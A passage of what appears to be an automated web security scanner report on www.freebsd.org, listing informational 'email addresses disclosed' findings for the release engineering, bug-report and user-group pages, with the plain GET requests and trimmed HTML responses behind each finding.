...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:uqs@FreeBSD.org">uqs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:flz@FreeBSD.org">flz@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:karlj000@unbc.ca">karlj000@unbc.ca</A>
...[SNIP]...
<A HREF="mailto:t.kempka@web.de">t.kempka@web.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:adam-ports@blacktabby.org">adam-ports@blacktabby.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ecrist@secure-computing.net">ecrist@secure-computing.net</A>
...[SNIP]...
<A HREF="mailto:sec@42.org">sec@42.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chip-set@mail.ru">chip-set@mail.ru</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:motoom@xs4all.nl">motoom@xs4all.nl</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hopet@ics.muni.cz">hopet@ics.muni.cz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ntarmos@cs.uoi.gr">ntarmos@cs.uoi.gr</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cy@FreeBSD.org">cy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wxs@FreeBSD.org">wxs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rene@FreeBSD.org">rene@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jacs@gnome.co.uk">jacs@gnome.co.uk</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sanpei@FreeBSD.org">sanpei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stephen@missouri.edu">stephen@missouri.edu</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marius@nuenneri.ch">marius@nuenneri.ch</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:naddy@FreeBSD.org">naddy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sec@42.org">sec@42.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:katsura@cc.osaka-kyoiku.ac.jp">katsura@cc.osaka-kyoiku.ac.jp</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:matt@bdd.net">matt@bdd.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joerg@FreeBSD.org">joerg@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.Org">ports@FreeBSD.Org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.veniamin@googlemail.com">g.veniamin@googlemail.com</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexander.pohoyda@gmx.net">alexander.pohoyda@gmx.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:decept0@gmail.com">decept0@gmail.com</A>
...[SNIP]...
<A HREF="mailto:decept0@gmail.com">decept0@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lazyklimm@gmail.com">lazyklimm@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gugod@gugod.org">gugod@gugod.org</A>
...[SNIP]...
<A HREF="mailto:sunrychen@gmail.com">sunrychen@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:darcsis@gmail.com">darcsis@gmail.com</A>
...[SNIP]...

24.322. http://www.freebsd.org/releng/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/releng/

Issue detail

The following email addresses were disclosed in the response:

freebsd-doc@FreeBSD.org
freebsd-www@FreeBSD.org
portmgr@FreeBSD.org
re-alpha@FreeBSD.org
re-amd64@FreeBSD.org
re-ia64@FreeBSD.org
re-pc98@FreeBSD.org
re-ppc@FreeBSD.org
re-sparc64@FreeBSD.org
re-x86@FreeBSD.org
re@FreeBSD.org
security-officer@FreeBSD.org

Request

GET /releng/ HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1693373868"
Last-Modified: Fri, 31 Dec 2010 18:24:41 GMT
Content-Length: 19990
Connection: close
Date: Mon, 24 Jan 2011 16:20:17 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a href="mailto:re@FreeBSD.org">re@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:re@FreeBSD.org">re@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:security-officer@FreeBSD.org">security-officer@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:portmgr@FreeBSD.org">portmgr@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:freebsd-doc@FreeBSD.org">freebsd-doc@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:freebsd-www@FreeBSD.org">freebsd-www@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:re@FreeBSD.org">re@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-alpha@FreeBSD.org">re-alpha@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-amd64@FreeBSD.org">re-amd64@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-ia64@FreeBSD.org">re-ia64@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-x86@FreeBSD.org">re-x86@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-pc98@FreeBSD.org">re-pc98@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-ppc@FreeBSD.org">re-ppc@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:re-sparc64@FreeBSD.org">re-sparc64@FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:portmgr@FreeBSD.org">portmgr@FreeBSD.org</a>
...[SNIP]...

24.323. http://www.freebsd.org/send-pr.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/send-pr.html

Issue detail

The following email address was disclosed in the response:

bugbusters@FreeBSD.org

Request

GET /send-pr.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2587588304"
Last-Modified: Tue, 04 Jan 2011 20:39:09 GMT
Content-Length: 12238
Connection: close
Date: Mon, 24 Jan 2011 16:39:38 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:bugbusters@FreeBSD.org">
...[SNIP]...
<img src="http://www.FreeBSD.org/cgi/confirm-code.cgi?db=sendpr"
alt="Random text; if you cannot see the image, please email bugbusters@FreeBSD.org"
height="24" border="0" />
...[SNIP]...

24.324. http://www.freebsd.org/usergroups.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/usergroups.html

Issue detail

The following email addresses were disclosed in the response:

22961476@students.ukdw.ac.id
admin@mnbsd.org
bsd-dk-request@bsd-dk.dk
bsd-il@libagent.org
buug-request@weak.org
contacto@bsd-peru.org
ernesto@freebsd.mx
freebsd-mke-l-request@ns.sol.net
freebsd-mke-l@ns.sol.net
info@MyBSD.org.my
info@bluefrogs.de
info@mybsd.org.my
info@rlug.org
jgrosch@mooseriver.com
kbug-admin@kbug.gr.jp
kendall@su3g.org
kulua@kulua.org
listar@rofug.ro
majordomo@FreeBSDDiary.org.ua
majordomo@lemis.com
majordomo@stacken.kth.se
majordomo@swcp.com
misc+subscribe@capbug.org
norcalfulua@gmail.com
pbclug@Comcast.net
pdx-freebsd@toybox.placo.com
ptbsd@yahoo.com
rcarter@consys.com
rcramer@sytex.net
rodrigo@bebik.net
sams@bsdgroups.org.uk
tcbug@tcbug.org
webmaster@svbug.com
wuug-list@unixpower.org

Request

GET /usergroups.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "464079767"
Last-Modified: Sun, 02 Jan 2011 00:10:42 GMT
Content-Length: 46552
Connection: close
Date: Mon, 24 Jan 2011 16:39:37 GMT
Server: httpd/1.4.x LaHonda

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org
...[SNIP]...
<a href="mailto:buug-request@weak.org">buug-request@weak.org</a>
...[SNIP]...
<a
href="mailto:kulua@kulua.org">kulua@kulua.org</a>
...[SNIP]...
<a href="mailto:tcbug@tcbug.org">tcbug@tcbug.org</a>
...[SNIP]...
<a name="north-america-nmlug" href="mailto:majordomo@swcp.com"
id="north-america-nmlug">
...[SNIP]...
<a
href="mailto:majordomo@swcp.com">majordomo@swcp.com</a>
...[SNIP]...
<a name="north-america-yfuug" href="mailto:rcarter@consys.com"
id="north-america-yfuug">
...[SNIP]...
<a
href="mailto:rcarter@consys.com">rcarter@consys.com</a>
...[SNIP]...
<a
href="mailto:pbclug@Comcast.net">
...[SNIP]...
<a name="north-america-portland" href="mailto:pdx-freebsd@toybox.placo.com"
id="north-america-portland">
...[SNIP]...
<a href="mailto:pdx-freebsd@toybox.placo.com">
...[SNIP]...
<a href="mailto:info@rlug.org">info@rlug.org</a>
...[SNIP]...
<a href="mailto:jgrosch@mooseriver.com">
...[SNIP]...
<a
href="mailto:webmaster@svbug.com">webmaster@svbug.com</a>
...[SNIP]...
<a name="north-america-wcfug" href="mailto:rcramer@sytex.net"
id="north-america-wcfug">
...[SNIP]...
<a
href="mailto:rcramer@sytex.net">rcramer@sytex.net</a>
...[SNIP]...
<a
href="mailto:freebsd-mke-l@ns.sol.net">freebsd-mke-l@ns.sol.net</a>
...[SNIP]...
<a
href="mailto:freebsd-mke-l-request@ns.sol.net">freebsd-mke-l-request@ns.sol.net</a>
...[SNIP]...
<a href="mailto:kendall@su3g.org">kendall@su3g.org</a>
...[SNIP]...
<a href="mailto:misc+subscribe@capbug.org">misc+subscribe@capbug.org</a>
...[SNIP]...
<a
href="mailto:norcalfulua@gmail.com">
...[SNIP]...
Group (Windsor, Ontario, Canada) covers BSD, Solaris, SCO and
others. This is not specifically a FreeBSD User Group, but we do already have members
running FreeBSD. The group operates a mailing list (wuug-list@unixpower.org). More
information can be found at <a href="http://www.wuug.org">
...[SNIP]...
<a
href="mailto:ernesto@freebsd.mx">
...[SNIP]...
<a
href="mailto:bsd-dk-request@bsd-dk.dk">bsd-dk-request@bsd-dk.dk</a>
...[SNIP]...
<a
href="mailto:info@bluefrogs.de">info@bluefrogs.de</a>
...[SNIP]...
<a
href="mailto:rodrigo@bebik.net">
...[SNIP]...
<a
href="mailto:listar@rofug.ro">listar@rofug.ro</a>
...[SNIP]...
<a name="europe-ptbsd" href="mailto:ptbsd@yahoo.com" id="europe-ptbsd">
...[SNIP]...
<a href="mailto:ptbsd@yahoo.com">ptbsd@yahoo.com</a>
...[SNIP]...
<a
href="mailto:majordomo@stacken.kth.se">majordomo@stacken.kth.se</a>
...[SNIP]...
<a
href="mailto:majordomo@FreeBSDDiary.org.ua">majordomo@FreeBSDDiary.org.ua</a>
...[SNIP]...
<a href="mailto:sams@bsdgroups.org.uk">
...[SNIP]...
<a
href="mailto:kbug-admin@kbug.gr.jp">kbug-admin@kbug.gr.jp</a>
...[SNIP]...
<a name="asia-jfug" href="mailto:22961476@students.ukdw.ac.id" id="asia-jfug">
...[SNIP]...
<a
href="mailto:22961476@students.ukdw.ac.id">22961476@students.ukdw.ac.id</a>
...[SNIP]...
<a name="asia-ibug" href="mailto:bsd-il@libagent.org" id="asia-ibug">
...[SNIP]...
<a
href="mailto:bsd-il@libagent.org">bsd-il@libagent.org</a>
...[SNIP]...
<a href="mailto:info@mybsd.org.my">info@MyBSD.org.my</a>
...[SNIP]...
<a
href="mailto:admin@mnbsd.org">admin@mnbsd.org</a>
